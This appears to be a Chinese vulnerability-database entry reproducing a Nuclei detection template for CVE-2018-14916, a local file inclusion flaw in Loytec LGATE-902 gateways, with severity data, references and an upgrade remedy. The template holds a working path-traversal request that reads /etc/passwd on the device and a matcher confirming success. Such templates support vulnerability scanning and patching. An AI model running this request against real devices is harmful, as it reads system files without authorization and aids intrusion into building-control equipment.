CVE-2018-14916: Loytec LGATE-902 <6.4.2 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Loytec LGATE-902 | POC: 已公开

漏洞描述

Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability.

PoC代码[已公开]

id: CVE-2018-14916

info:
  name: Loytec LGATE-902 <6.4.2 - Local File Inclusion
  author: 0x_Akoko
  severity: critical
  description: Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the device.
  remediation: |
    Upgrade the Loytec LGATE-902 device to version 6.4.2 or later to mitigate the vulnerability.
  reference:
    - https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-14916
    - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
    - https://seclists.org/fulldisclosure/2019/Apr/12
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2018-14916
    cwe-id: CWE-732
    epss-score: 0.68248
    epss-percentile: 0.98559
    cpe: cpe:2.3:h:loytec:lgate-902:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: loytec
    product: lgate-902
  tags: cve2018,cve,loytec,lfi,packetstorm,seclists,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220743d907d5d6a40cd15ea1a8b75ff29e6141456997cd3fcbe5d4efec0aeb91441022100e1a8b4b9ced4f88ccc562acf62c72ac5a8786950e2339e0e2c267bcef4a6431d:922c64590222798bb761d5b6d8e72950

相关漏洞推荐